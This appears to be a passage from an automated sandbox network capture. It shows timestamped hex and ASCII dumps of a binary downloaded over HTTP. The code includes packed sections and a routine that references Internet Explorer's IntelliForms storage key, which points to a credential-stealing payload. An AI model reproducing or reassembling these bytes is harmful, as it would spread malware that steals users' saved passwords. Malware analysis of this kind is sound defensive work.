89 45 10 e8 74 be 00 00 8b 55 14 8b d8 52 c6 43 fd 00 e8 b5 bd 00 00 40 50 8b 45 14 50 56 e8 Data Ascii: EEfEujjURSjjEPS 3jjpQSpquy}EEEfEE3jjURSEEEEEEEEfEEnjjVST0E\|MQPUURMDQPEtURC@PEPV
2021-09-27 18:36:57 UTC	62	IN	Data Raw: 50 8d 55 94 52 53 e8 5c ae 00 00 83 c4 10 85 c0 75 1f 8d 45 d4 50 e8 0c ae 00 00 50 8d 4d d4 51 53 e8 41 ae 00 00 83 c4 10 85 c0 0f 84 a4 00 00 00 8b 55 fc 53 52 57 8d 85 70 fe ff ff 50 56 e8 73 f9 ff ff 8b 4d fc 51 8b 4d 08 8d 95 70 fe ff ff 8b f8 52 8d 85 6c fd ff ff 50 51 e8 d6 fc ff ff 8d 95 6c fd ff ff 68 04 01 00 00 52 c7 45 f8 00 00 00 00 e8 0e ab 00 00 8d 85 70 fe ff ff 68 04 01 00 00 50 e8 fd aa 00 00 83 c4 34 eb 46 0f b6 4c 37 01 51 e8 ed b3 00 00 83 c4 04 85 c0 74 04 6a 40 eb 27 8b 55 fc 53 52 57 8d 85 6c fd ff ff 50 56 e8 ff f8 ff ff 83 c4 14 8b f8 c7 45 f8 01 00 00 00 eb 0f 80 3b 00 74 0a 51 53 e8 b5 aa 00 00 83 c4 08 8b 4d f4 47 3b f9 0f 82 a6 fe ff ff 56 8b 75 08 56 e8 4c aa 00 00 53 56 e8 45 aa 00 00 83 c4 10 5f 5e 5b 8b e5 5d c3 a4 84 75 Data Ascii: PURS\uEPPMQSAUSRWpPVsMQMpRlPQlhREphP4FL7Qtj@'USRWlPVE;tQSMG;VuVLSVE_^[]u
2021-09-27 18:36:57 UTC	63	IN	Data Raw: ff ff 51 66 89 85 f8 fd ff ff e8 bb a7 00 00 8b 45 1c 83 c4 0c 83 f8 01 0f 85 9c 00 00 00 8b 55 0c 6a 00 52 8d 85 f8 fd ff ff 50 e8 7a ab 00 00 8d 8d f8 fd ff ff 51 e8 fe a9 00 00 83 c4 10 66 83 bc 45 f6 fd ff ff 5c 74 1c 8d 95 f8 fd ff ff 52 e8 e4 a9 00 00 b9 5c 00 00 00 83 c4 04 66 89 8c 45 f8 fd ff ff 8b 55 18 8b 45 10 52 50 8d 8d f8 fd ff ff 51 e8 c0 a9 00 00 8d 94 45 f8 fd ff ff 83 c4 04 52 e8 c0 f4 ff ff 8b 75 08 6a 00 6a 15 8d 85 f8 fd ff ff 50 56 e8 2c 40 00 00 83 c4 1c 85 c0 74 59 8d 8d f8 fd ff ff 51 56 e8 68 f9 ff ff 83 c4 08 5e 8b e5 5d c3 83 f8 02 75 3f 8b 75 14 56 e8 72 a9 00 00 50 56 8b 75 10 56 e8 47 ae 00 00 83 c4 10 85 c0 74 24 8b 55 0c 56 52 8d 85 f8 fd ff ff 50 e8 5f f4 ff ff 8b 55 08 8d 8d f8 fd ff ff 51 52 e8 ff fb ff ff 83 c4 14 5e Data Ascii: QfEUjRPzQfE\tR\fEUERPQERujjPV,@tYQVh^]u?uVrPVuVGt$UVRP_UQR^
2021-09-27 18:36:57 UTC	68	IN	Data Raw: ac 01 00 00 83 7e 28 00 0f 84 a2 01 00 00 85 c0 0f 84 9a 01 00 00 83 7e 2c 00 0f 84 90 01 00 00 83 7e 30 00 0f 84 86 01 00 00 83 7e 34 00 0f 84 7c 01 00 00 8b 5d 10 53 8d 85 4c fe ff ff 50 6a 01 6a 00 57 e8 4c f9 ff ff 83 c4 14 85 c0 75 2a 81 fb 24 10 00 00 75 11 5b c7 87 fc 09 00 00 01 00 00 00 5f 5e 8b e5 5d c3 5b c7 87 00 0a 00 00 01 00 00 00 5f 5e 8b e5 5d c3 6a 00 6a 04 8d 5e 68 53 57 e8 fd 93 ff ff 6a 00 8d 8d 2c fe ff ff 51 53 e8 8e 9a 00 00 53 8d 95 08 f9 ff ff 52 57 e8 50 f5 ff ff 8d 85 08 f9 ff ff 53 50 e8 b3 9c 00 00 8b 46 28 8d 4d f8 51 8d 95 08 f9 ff ff 52 ff d0 83 c4 38 85 c0 0f 85 ae 00 00 00 50 8b 45 f8 8d 4d fc 51 8b 4e 30 6a ff 8d 95 ac fe ff ff 52 50 ff d1 83 c4 14 85 c0 0f 85 8c 00 00 00 8b 55 fc 8b 46 2c 52 ff d0 83 c4 04 83 f8 64 75 Data Ascii: ~(~,~0~4\|]SLPjjWLu*$u[_^][_^]jj^hSWj,QSSRWPSPF(MQR8PEMQN0jRPUF,Rdu
2021-09-27 18:36:57 UTC	72	IN	Data Raw: 89 85 68 ff ff ff 89 85 6c ff ff ff 89 85 70 ff ff ff 89 85 74 ff ff ff 66 89 85 48 fd ff ff e8 9c 86 00 00 68 06 02 00 00 8d 85 42 fb ff ff 33 d2 53 50 66 89 95 40 fb ff ff e8 81 86 00 00 6a 30 8d 55 c8 53 52 c7 85 78 ff ff ff 49 00 6e 00 c7 85 7c ff ff ff 74 00 65 00 c7 45 80 72 00 6e 00 c7 45 84 65 00 74 00 c7 45 88 20 00 45 00 c7 45 8c 78 00 70 00 c7 45 90 6c 00 6f 00 c7 45 94 72 00 65 00 c7 45 98 72 00 5c 00 c7 45 9c 49 00 6e 00 c7 45 a0 74 00 65 00 c7 45 a4 6c 00 6c 00 c7 45 a8 69 00 46 00 c7 45 ac 6f 00 72 00 c7 45 b0 6d 00 73 00 c7 45 b4 5c 00 53 00 c7 45 b8 74 00 6f 00 c7 45 bc 72 00 61 00 c7 45 c0 67 00 65 00 c7 45 c4 32 00 00 00 e8 e3 85 00 00 8b 75 08 6a 01 6a 0d 8d 85 48 fd ff ff 50 56 e8 0f 83 ff ff 8d 8d 48 fd ff ff 51 e8 33 88 00 00 ba 5c Data Ascii: hlptfHhB3SPf@j0USRxIn\|teErnEetE EExpEloEreEr\EInEteEllEiFEorEmsE\SEtoEraEgeE2ujjHPVHQ3\
2021-09-27 18:36:57 UTC	76	IN	Data Raw: eb 09 8d a4 24 00 00 00 00 8b ff 8b 8d ac fb ff ff 8b 45 e4 83 c1 02 51 8d 95 b0 fb ff ff 52 50 e8 96 75 00 00 68 19 02 02 00 53 8d 4d f4 51 56 e8 b6 88 ff ff 83 c4 1c 85 c0 0f 84 bd 01 00 00 68 fe 03 00 00 8d 85 a2 f7 ff ff 33 d2 57 50 89 7d f8 89 7d fc 66 89 95 a0 f7 ff ff e8 da 75 00 00 68 fe 03 00 00 8d 95 a2 f3 ff ff 33 c9 57 52 66 89 8d a0 f3 ff ff e8 bf 75 00 00 53 e8 29 78 00 00 b9 5c 00 00 00 66 89 0c 43 8d 7c 43 02 8d 45 fc 50 68 00 04 00 00 33 d2 8d 8d a0 f7 ff ff 51 52 52 66 89 17 8b 55 f4 52 56 89 7d e0 e8 18 58 00 00 83 c4 38 85 c0 0f 85 30 01 00 00 8b 85 ac f7 ff ff 83 c0 02 50 8d 8d b0 f7 ff ff 51 57 e8 e6 74 00 00 68 19 02 02 00 53 8d 55 f0 52 56 e8 06 88 ff ff 83 c4 1c 85 c0 0f 84 bf 00 00 00 8b 55 f0 8d 45 fc 50 68 00 04 00 00 8d 8d a0 Data Ascii: $EQRPuhSMQVh3WP}}fuh3WRfuS)x\fC\|CEPh3QRRfURV}X80PQWthSURVUEPh
2021-09-27 18:36:57 UTC	80	IN	Data Raw: 55 f4 51 52 68 80 00 00 00 50 8d 45 e4 50 8d 4d c4 51 53 8d 55 fc 52 57 e8 29 4a 00 00 8b d8 8b 45 e0 50 57 e8 ed 64 00 00 33 c9 83 c4 38 3b d9 0f 8c ac 01 00 00 8b 45 fc 83 f8 ff 0f 84 a0 01 00 00 83 fe 16 74 a8 83 fe 17 74 a3 83 fe 19 0f 84 5a 01 00 00 83 fe 0f 0f 84 67 01 00 00 83 fe 0b 0f 84 5e 01 00 00 83 fe 0c 0f 84 55 01 00 00 83 fe 14 0f 84 4c 01 00 00 83 fe 1b 0f 84 43 01 00 00 83 fe 1c 0f 84 3a 01 00 00 83 fe 12 0f 84 31 01 00 00 83 fe 1a 0f 84 28 01 00 00 83 fe 0d 0f 84 1f 01 00 00 83 fe 0e 0f 84 16 01 00 00 83 fe 20 0f 84 0d 01 00 00 83 fe 04 74 62 83 fe 11 74 5d 83 fe 10 74 58 83 fe 03 75 14 8d 4d fc 51 57 e8 e0 f9 ff ff 83 c4 08 5e 5b 5f 8b e5 5d c3 83 fe 05 75 18 8d 55 e4 52 8d 45 fc 50 57 e8 63 fa ff ff 83 c4 0c 5e 5b 5f 8b e5 5d c3 83 fe Data Ascii: UQRhPEPMQSURW)JEPWd38;EttZg^ULC:1( tbt]tXuMQW^[_]uUREPWc^[_]
2021-09-27 18:36:57 UTC	84	IN	Data Raw: 52 50 e8 aa 54 00 00 ff 07 83 c4 0c 83 06 03 5b 5f 5e 8b e5 5d c3 3c f7 75 2d 8b 75 18 8b 0e 8b 55 10 8b 7d 14 8d 44 11 02 8b 0f 03 4d 0c 6a 04 50 51 e8 7a 54 00 00 83 07 04 83 c4 0c 83 06 06 5b 5f 5e 8b e5 5d c3 3c ff 75 2b 8b 7d 18 8b 45 10 03 07 80 78 01 35 75 1d 8b 75 14 8b 0e 03 4d 0c 6a 04 83 c0 02 50 51 e8 44 54 00 00 83 06 04 83 c4 0c 83 07 06 5b 5f 5e 8b e5 5d c3 ec 76 7c ab 55 8b ec 8b 45 0c 83 ec 0c 57 50 e8 b0 e6 ff ff 8b f8 83 c4 04 80 3f 55 75 79 80 7f 01 8b 75 73 53 8b 5d 08 56 33 f6 83 c7 03 89 75 f8 89 75 fc 39 75 10 76 55 8b 4d fc 8a 04 39 03 cf 88 45 f4 8d 50 c0 80 fa 1f 77 18 6a 01 51 8d 04 1e 50 e8 dc 53 00 00 46 83 c4 0c ff 45 fc 89 75 f8 eb 25 2c 70 3c 0f 77 06 83 45 fc 02 eb 19 8b 45 f4 8d 4d fc 51 8d 55 f8 52 57 53 50 e8 c1 f7 ff Data Ascii: RPT[_^]<u-uU}DMjPQzT[_^]<u+}Ex5uuMjPQDT[_^]v\|UEWP?UuyusS]V3uu9uvUM9EPwjQPSFEu%,p<wEEMQURWSP
2021-09-27 18:36:57 UTC	88	IN	Data Raw: 54 eb d8 dc a8 72 3f d4 52 7c 88 a3 d5 2f 4b 68 9e aa 6d 8a d5 f6 52 ea 6b c5 d2 ce 01 26 49 df 8e 1b f1 fc a7 f1 e1 26 02 09 3b 07 66 76 c5 e4 93 ef 34 7c b3 96 fd 90 50 ab e9 4f d8 05 8e 19 6e 19 63 fb 97 22 14 e1 1d b5 8e 0b cb 0b 6e f8 58 02 b0 3b 7d fe ff d5 44 a2 59 8f 6b 4e 80 7c ee 7f 20 b3 14 d4 9f 0f ac eb 8a de d9 7d b8 61 01 4d 5f 1c 0f 38 0b d7 95 94 46 54 12 86 62 e4 7c 04 1c 18 62 23 0e bd 25 ea ae 2d 38 47 59 7d fb 1e 86 dd 04 80 ca 2d ad 71 93 ea 52 6c 43 6d 3c 51 fc dc 04 1c 80 06 40 22 5a d2 2e a9 28 5d 9c 1f 92 dd 42 6a 6f be 22 78 d3 27 14 b5 f8 e8 90 54 e0 c6 7e de cf ad 82 8f 8e f0 64 c9 bc 50 3d ce 7f 55 9f 1d ed 15 d5 b7 38 81 b2 60 d3 a2 e2 46 aa 68 2a c9 d4 06 58 4d 4f a1 45 57 c1 55 38 ef 65 3f 9a 7e c2 f8 71 71 08 3f bd 34 23 Data Ascii: Tr?R\|/KhmRk&I&;fv4\|POnc"nX;}DYkN\| }aM_8FTb\|b#%-8GY}-qRlCm<Q@"Z.(]Bjo"x'T~dP=U8`Fh*XMOEWU8e?~qq?4#
2021-09-27 18:36:57 UTC	92	IN	Data Raw: 53 56 57 68 f8 00 00 00 8d 85 9d fe ff ff 6a 00 50 c6 85 9c fe ff ff 00 e8 0a 34 00 00 83 c4 0c 68 f7 00 00 00 e8 ac 60 00 00 83 c0 02 50 8d 8d 9c fe ff ff 51 e8 3d df ff ff 8b 5d 08 83 c4 0c 68 f0 02 00 00 8d b3 44 04 00 00 e8 19 62 00 00 83 c0 02 50 56 e8 1d df ff ff 83 c4 0c 6a 14 8d bb b8 07 00 00 e8 b2 5b 00 00 83 c0 02 50 57 e8 03 df ff ff 8d 55 98 52 e8 9a 1e ff ff 68 f7 00 00 00 8d 85 9c fe ff ff 50 8d 4d 98 51 e8 05 2c ff ff 8d 55 98 52 e8 cc 2b ff ff 6a 14 8d 45 98 50 81 c3 a4 07 00 00 53 e8 fa 32 00 00 53 68 f0 02 00 00 56 e8 5e 2c ff ff 8d 4d 98 51 e8 55 1e ff ff 6a 14 8d 55 98 57 52 e8 c9 2b ff ff 8d 45 98 83 c4 48 50 e8 8d 2b ff ff 8d 4d 98 51 68 f0 02 00 00 56 e8 2e 2c ff ff 8d 55 98 52 e8 25 1e ff ff 68 f0 02 00 00 8d 45 98 56 50 e8 96 2b Data Ascii: SVWhjP4h`PQ=]hDbPVj[PWURhPMQ,UR+jEPS2ShV^,MQUjUWR+EHP+MQhV.,UR%hEVP+
2021-09-27 18:36:57 UTC	95	IN	Data Raw: 00 00 00 c7 86 60 02 00 00 1a 00 00 00 c7 86 64 02 00 00 f7 00 00 00 c7 86 6c 02 00 00 2d 00 00 00 c7 86 68 02 00 00 06 00 00 00 e8 1a 27 00 00 83 c4 14 68 04 0a 00 00 e8 09 3f 00 00 83 c0 02 50 81 c6 10 03 00 00 56 e8 cd d2 ff ff 83 c4 0c 5f 5e 5b 5d c3 32 5f ac f9 66 55 8b ec 81 ec fc 00 00 00 56 68 f8 00 00 00 8d 85 05 ff ff ff 6a 00 50 c6 85 04 ff ff ff 00 e8 4c 27 00 00 83 c4 0c 68 f7 00 00 00 e8 ee 53 00 00 83 c0 02 50 8d 8d 04 ff ff ff 51 e8 7f d2 ff ff 8d 95 04 ff ff ff 52 e8 13 e9 fe ff 8b 75 0c 68 f7 00 00 00 8d 85 04 ff ff ff 50 56 e8 8e 26 00 00 83 c4 1c 6a 14 e8 f9 4e 00 00 83 c0 02 50 8d 8e f7 00 00 00 51 e8 44 d2 ff ff 83 c4 0c 6a 14 e8 3c 53 00 00 83 c0 02 50 8d 96 0b 01 00 00 52 e8 2a d2 ff ff 83 c4 0c 6a 14 e8 f9 52 00 00 83 c0 02 50 8d Data Ascii: `dl-h'h?PV_^[]2_fUVhjPL'hSPQRuhPV&jNPQDj<SPR*jRP
2021-09-27 18:36:57 UTC	100	IN	Data Raw: 00 56 6a 39 6a 00 51 8d b0 88 0c 00 00 56 50 e8 c1 07 00 00 8b 55 20 8b 45 1c 8b 4d 18 83 c4 14 52 8b 55 14 50 8b 45 10 51 8b 4d 0c 52 8b 16 50 51 ff d2 5e 5d c3 20 8a f9 97 2d 8b c3 11 74 d4 ca 98 54 1e 73 55 8b ec 8b 45 08 8b 88 18 0a 00 00 56 6a 46 6a 00 51 8d b0 8c 0c 00 00 56 50 e8 71 07 00 00 8b 55 14 8b 45 10 8b 4d 0c 83 c4 14 52 8b 16 50 51 ff d2 5e 5d c3 46 89 00 89 10 45 b5 ea aa 82 20 55 8b ec 8b 45 08 8b 88 18 0a 00 00 56 6a 47 6a 00 51 8d b0 90 0c 00 00 56 50 e8 31 07 00 00 8b 55 10 8b 45 0c 8b 0e 83 c4 14 52 50 ff d1 5e 5d c3 80 a5 97 0d 73 db 0a ba 9d 0c a6 96 3f c9 cd 55 8b ec 8b 45 08 8b 48 0c 56 6a 02 51 8d b0 7c 09 00 00 56 50 e8 66 07 00 00 8b 55 0c 8b 06 83 c4 10 52 ff d0 5e 5d c3 48 f2 91 0f f3 e0 3b fb 55 8b ec 8b 45 08 8b 48 0c 56 Data Ascii: Vj9jQVPU EMRUPEQMRPQ^] -tTsUEVjFjQVPqUEMRPQ^]FE UEVjGjQVP1UERP^]s?UEHVjQ\|VPfUR^]H;UEHV
2021-09-27 18:36:57 UTC	104	IN	Data Raw: 38 54 31 05 75 09 89 44 31 05 bb 01 00 00 00 41 3b cf 72 dc 53 e8 b6 98 ff ff 83 c4 04 85 c0 75 07 5f 5e 5b 8b e5 5d c3 8d 45 98 50 e8 7f f1 fe ff 6a 04 8d 4d 0c 51 8d 55 98 52 e8 f0 fe fe ff 8d 45 98 50 e8 b7 fe fe ff 6a 14 8d 4d 98 51 56 33 db e8 e9 05 00 00 83 c4 20 8d 7b 14 8d 49 00 53 e8 ea 0b 00 00 8b d8 88 1c 37 47 83 c4 04 81 ff 00 10 00 00 72 e9 5f 5e b8 01 00 00 00 5b 8b e5 5d c3 6d c0 65 0b 08 35 75 d0 1c 0e e4 cf 76 55 8b ec 81 ec 84 00 00 00 56 c7 45 f8 00 00 00 00 40 41 49 48 b8 88 88 88 88 89 45 f8 90 8b 45 f8 89 45 fc e8 16 39 00 00 81 7d fc 88 88 88 88 8b f0 74 4b 8d 8d 7c ff ff ff 51 e8 e0 f0 fe ff 6a 04 8d 55 fc 52 8d 85 7c ff ff ff 50 e8 4e fe fe ff 8d 8d 7c ff ff ff 51 e8 12 fe fe ff 83 c4 14 6a 14 8d 95 7c ff ff ff 52 4e 56 e8 4f 08 Data Ascii: 8T1uD1A;rSu_^[]EPjMQUREPjMQV3 {IS7Gr_^[]me5uvUVE@AIHEEE9}tK\|QjUR\|PN\|Qj\|RNVO
2021-09-27 18:36:57 UTC	108	IN	Data Raw: 75 f9 57 85 d2 74 1f 8d bd fc fe ff ff 8b ce 2b fe 8b f2 8a 01 3c 41 7c 06 3c 5a 7f 02 04 20 88 04 0f 41 4e 75 ed 53 8b 5d 10 3b da 77 5b 33 f6 2b d3 89 55 14 8d 9b 00 00 00 00 8a 4d 0c 38 8c 35 fc fe ff ff 8d bc 35 fc fe ff ff 75 35 8d 53 02 52 8d 85 f8 fd ff ff 50 e8 8d f5 ff ff 53 8d 8d f8 fd ff ff 57 51 e8 4f f5 ff ff 8b 45 08 8d 95 f8 fd ff ff 52 50 e8 5f 92 ff ff 83 c4 1c 85 c0 75 0f 46 3b 75 14 76 b2 5b 5f 33 c0 5e 8b e5 5d c3 5b 5f b8 01 00 00 00 5e 8b e5 5d c3 a8 b9 2a 97 02 de 62 40 57 2f bb 88 be 55 8b ec 81 ec 04 01 00 00 56 8b 75 14 85 f6 75 07 33 c0 5e 8b e5 5d c3 68 03 01 00 00 8d 85 fd fe ff ff 6a 00 50 c6 85 fc fe ff ff 00 e8 5e f5 ff ff 0f b7 16 83 c4 0c 33 c0 66 85 d2 74 16 8b ce 8a 09 88 8c 05 fc fe ff ff 40 66 83 3c 46 00 8d 0c 46 75 Data Ascii: uWt+<A\|<Z ANuS];w[3+UM855u5SRPSWQOERP_uF;uv[_3^][_^]*b@W/UVuu3^]hjP^3ft@f<FFu
2021-09-27 18:36:57 UTC	112	IN	Data Raw: 09 1d e9 07 7c 0c e9 31 fd ff ff 1b 25 e9 8c fa e3 00 25 a8 02 8b ee 09 0d ee b9 f7 a3 ae 10 05 12 de b1 d7 5c b1 28 8b 2d 05 bc 26 cf 33 15 9d d0 ed c7 bd 93 93 e8 a2 ae 21 2d 0d cf 93 8b c1 05 dd 90 3b cf a2 80 cf f9 c1 2d d1 86 ca 60 95 00 35 34 10 a7 74 33 3d 8d 05 fb e6 c0 0d 86 d8 09 da f4 80 d6 10 3a 35 b6 21 88 49 80 e1 3a 89 3d 07 ab 36 99 0f 87 c1 fc ff ff 81 c2 77 a9 9d ec 81 ec 09 3b 7d 57 87 15 9a 20 d4 95 81 ee ff 0b 0a f9 a6 22 0d 1a ef ed de 32 3d b1 14 25 67 23 15 17 b5 cc d5 2b 0d 67 58 3a b0 81 e9 05 ae 6f 7e 5b c1 25 bd 79 87 f2 b2 20 15 b0 7e 26 ef c0 25 3c dc d2 1b 30 3b 3d 25 e1 63 68 33 05 9e 67 4f 66 12 05 3a 14 4d 6f 3b 25 06 bf 3d ab 5f 49 29 15 92 46 74 32 0f 8e 4f fc ff ff 69 2d 7e 5f 79 8d ce 12 00 00 66 a7 c1 25 9a 1d 19 8b Data Ascii: \|1%%\(-&3!-;-`54t3=:5!I:=6w;}W "2=%g#+gX:o~[%y ~&%<0;=%ch3gOf:Mo;%=_I)Ft2Oi-~_yf%
2021-09-27 18:36:57 UTC	116	IN	Data Raw: ad 8d d8 45 3b 15 ef 16 4c e0 90 0f 87 4a fd ff ff 11 1d 77 89 00 a8 81 f6 c4 a8 d8 45 85 2d ef 16 3f 9e 1b 25 c0 2b 9e 0f c1 1d a1 b2 ec 40 60 12 35 88 ef 16 8f 21 3d d6 80 63 82 32 3d 00 a8 c4 a8 c1 0d d8 45 ef 16 a1 31 15 1f 12 bc 2b 2b 35 9e 0f a1 b2 33 3d ec 40 88 ef 0b 35 16 4b e2 9f 03 25 31 cc f0 cc 81 f4 c2 5f 39 49 d0 0d d2 16 16 94 1b 3d 33 2e c3 de 0b 1d c1 32 cc e0 86 35 a8 ef 16 62 c0 2d e2 81 80 9a 27 c0 1d 00 a8 c4 a8 e2 87 25 d8 45 ef 16 28 3d b6 d6 78 3a 09 0d 17 52 40 50 03 35 8d d8 45 ef 0c 16 c3 e8 00 00 00 00 58 c3 55 8b ec 3a 25 28 15 88 b9 33 35 85 7a 79 33 20 1d 18 47 09 4a c0 2d 12 8c 17 28 7e 01 3d 07 02 4d 29 0c 03 c3 e8 00 00 00 00 58 c3 55 8b ec 80 df c9 0b 3d d4 0d 45 24 69 35 60 d1 ff 1e 39 32 00 00 56 bf ef 86 4f 38 c1 15 Data Ascii: E;LJwE-?%+@`5!=c2=E1++53=@5K%1_9I=3.25b-'%E(=x:R@P5EXU:%(35zy3 GJ-(~=M)XU=E$i5`92VO8
2021-09-27 18:36:57 UTC	120	IN	Data Raw: 0f e4 93 e8 a3 35 c9 cc 1b 70 6c 04 ee ce a9 db f4 fb ca 0d c2 81 30 04 2b 9b 1a e8 a2 93 1a 7f 01 e1 c8 f4 3c f2 64 b2 57 1b 4b 73 de e8 d3 dc ae 7a 96 cb 20 5d 11 2f a0 bb 12 00 c6 88 1d a5 ff fe 09 23 11 d2 a3 0a 49 f1 52 66 af 99 aa ed 74 40 72 7d ea c9 29 14 10 5b 22 dd 68 c4 cd 88 2b 93 6b f3 fc 1e 7f 94 4f 8c ea 47 d6 0c 69 84 45 70 53 f6 a0 29 a6 9b 48 89 03 84 a2 56 37 6a 88 53 20 cc 23 92 1b cc 7b ba 0b 70 82 20 8d 57 96 41 be 5c 74 2a 30 dd 1d 58 61 f9 f8 53 0a a3 cf 56 d8 6d 27 b6 5b 28 00 28 3b a0 ab 52 2c 72 22 38 89 52 c5 94 86 28 f5 27 d5 50 7e d3 22 80 a7 23 db 9f f4 a8 16 8a 09 de df ae 15 46 23 26 e0 87 8a 9f f4 37 00 9e 34 eb c8 c3 21 61 df e9 9a e9 37 c5 b3 88 a6 39 e1 d4 6c 08 8e d3 4d 12 bb 01 e0 bb 80 57 5e 2a 53 75 82 53 eb d7 04 Data Ascii: 5pl0+<dWKsz ]/#IRft@r})["h+kOGiEpS)HV7jS #{p WA\t0XaSVm'[((;R,r"8R('P~"#F#&74!a79lMW^SuS
2021-09-27 18:36:57 UTC	124	IN	Data Raw: 45 ef 51 1e ae 29 9a 03 e3 76 60 0d 1a 7f 64 69 0a 3a da db d7 06 ca 8b d9 eb ae 87 4e 68 2a 15 4e e7 b5 76 e6 fb 9b cc 81 52 03 79 cc a0 ee 32 9b c7 f4 c0 aa 8b be 13 6e 95 4b ca 0d e2 ca 74 00 03 50 17 5e 9f 49 7b 1a ed 40 3e 0c aa c8 97 1e f2 87 5d 50 80 1e e5 db 56 c6 2d 03 ec f1 2b 80 76 6b 8c fc 9b 23 4e f7 84 cb 8b 5c 8c 6e a4 64 1d 3f 1e a7 3d f5 83 47 5a 7f 96 15 b9 cf 83 1a 80 6a 49 32 02 8f 01 7e f2 4b d0 2b 25 27 58 4d f0 fd 50 af 19 58 32 3a 4b 59 62 e3 f2 4e 1d 51 90 7b 97 cb 22 3a 7c 75 be 38 e6 e2 bb 64 e2 ed d8 2b d2 e1 29 fe 45 b2 01 ae 18 93 88 43 f1 07 8a bf a5 ec 2f db 0a c5 0b 10 d0 d7 9b 31 a9 1b 76 ec ab e5 c4 57 fa 62 41 bb 14 17 c9 f8 95 fe b8 fc 80 39 8c 93 d9 a2 a5 c1 39 e9 8d d2 c8 01 1d 4e 2b 7d 20 21 26 d2 45 57 1c 60 6d 11 Data Ascii: EQ)v`di:Nh*NvRy2nKtP^I{@>]PV-+vk#N\nd?=GZjI2~K+%'XMPX2:KYbNQ{":\|u8d+)EC/1vWbA99N+} !&EW`m
2021-09-27 18:36:57 UTC	127	IN	Data Raw: c0 0f 8e ba 7d 2d e4 18 e0 46 5f 9c a4 1f 68 3b a1 3d 63 58 f8 ad 35 d4 d5 f6 a0 98 9b c9 1d a5 89 f1 9e 99 ab 05 c7 15 a2 56 25 e4 fe 2a 91 5d ef fc ed bb bf 12 73 ea ce 6b 2d 0a 6b 49 e0 bf d2 11 6f cb 50 1f 5c 8a 24 f6 03 37 27 52 2b c7 2f 5f 8f 17 13 e8 da f7 75 0a e4 a3 b5 b6 95 29 3f 58 6d f4 11 9a 24 bb 2f dc 4e 59 48 45 9f fa 41 89 02 d0 76 52 26 6e bf b8 09 ac e0 99 30 4c 99 04 9f 0f 43 68 c9 fd ae 29 b4 a3 e6 bc fb 6a 76 c4 71 38 c9 88 97 1f a2 91 fd 08 81 95 5b 19 08 6d 16 df b3 23 1c a2 68 b7 a5 f0 29 ab a4 df 4b c8 1e 00 e4 fa 14 33 a2 02 06 84 90 77 57 34 f3 2a 26 94 0c e6 77 46 eb 6e 39 1b 0f d3 3a a3 89 d8 90 dd c1 05 fa 61 c1 1c c6 41 f7 73 73 f3 27 ad 86 69 ad 6b bc 5d 81 a2 b3 5f 72 2b b1 8a 70 f6 d8 29 9b 65 28 cc 8f 3b a1 89 44 a2 35 Data Ascii: }-F_h;=cX5V%]sk-kIoP\$7'R+/_u)?Xm$/NYHEAvR&n0LCh)jvq8[m#h)K3wW4&wFn9:aAss'ik]_r+p)e(;D5
2021-09-27 18:36:57 UTC	132	IN	Data Raw: 8e ff 29 ab c6 47 cf f1 96 e6 40 16 b4 2c e3 cd 8e 22 f5 6a a0 ee cc ce ea f2 c0 6c f2 80 ea bb 5a 6b 12 7c 8b 72 e8 3b 5c ca 08 52 5d 24 85 de 47 3c a9 8f eb ed b1 84 e3 90 91 4e 4f 89 64 41 e6 d5 68 f3 22 6e 40 f7 b4 5e 1b 08 c1 91 3a ec 88 db 43 02 e8 04 3c 97 c4 52 69 e0 45 ed 33 92 a1 f9 ed 81 97 a2 92 94 37 e3 78 a5 57 db 0d 65 3b 19 c9 67 cc b7 56 e3 36 75 fc 3f 27 d9 95 1f a0 2d 68 97 97 6d cc e7 41 8e 96 c4 40 00 0d f3 4e 20 ed 3b 8e 96 fa 11 f9 f7 27 7c 62 36 c8 24 b1 28 e0 67 aa c9 16 5b 2d 35 94 25 2b 61 c4 5a d7 19 e0 bf 51 be 30 2b 41 77 6c d7 53 cd e4 19 e1 1c 05 ee c3 9b 9b 14 7e 4c 0d 3d 20 60 1a 7b 93 f0 84 7e f0 8a e8 5b be b0 e0 11 fc b7 fa bd 79 c0 39 44 79 07 e6 f8 f8 31 53 f8 45 98 97 c3 0f 29 ee a1 90 90 c2 67 a8 12 ae 6a 05 d9 9d Data Ascii: )G@,"jlZk\|r;\R]$G<NOdAh"n@^:C<RiE37xWe;gV6u?'-hmA@N ;'\|b6$(g[-5%+aZQ0+AwlS~L= `{~[y9Dy1SE)gj
2021-09-27 18:36:57 UTC	136	IN	Data Raw: b1 30 43 02 69 50 d1 4a cf ca b0 03 d4 6f 71 cf 82 44 ff 3b a5 57 34 f7 1c aa 05 da 52 5f a7 d7 fa e7 5f d1 e5 60 b8 cb c8 6e 12 9d de 55 4a aa 59 09 5f c8 b9 d0 17 50 94 d7 87 24 95 61 f0 73 92 0c 07 1b 6d c9 18 fc 39 e2 28 bc 46 5f 4f f5 2e 49 ef 04 8a d8 62 aa 3a d2 92 c8 e4 9f 13 dc 7e 0e 63 ac 96 8b fd 2f ee ea e9 18 51 9d fc be 42 f5 13 09 2b 0c 76 81 d7 03 37 4c 1b db 3d 3f 69 50 98 4f 37 27 f8 71 7c 96 c1 86 bc 5d e4 0b 92 e0 0f 5f ed bb a0 04 32 84 1d 6b 12 99 2c 92 e1 27 59 02 fd a4 1b 6f 08 72 ac 81 0a 8d 44 7d 68 fb 74 62 d1 2d 11 6b c8 e6 31 97 25 0a 4b b0 65 d7 f0 f4 71 af e1 2c fc b4 cd 5b 54 5d a0 7d 2e ba a0 a2 3d 85 5b f8 57 58 f5 40 79 9a 84 fe df 24 89 b5 41 8d 53 ba aa 14 0b 89 76 53 ee 72 0f 1c 35 a4 78 cb ff 2a ee 7b c2 f6 28 6b d8 Data Ascii: 0CiPJoqD;W4R__`nUJY_P$asm9(F_O.Ib:~c/QB+v7L=?iPO7'q\|]_2k,'YorD}htb-k1%Keq,[T]}.=[WX@y$ASvSr5x*{(k
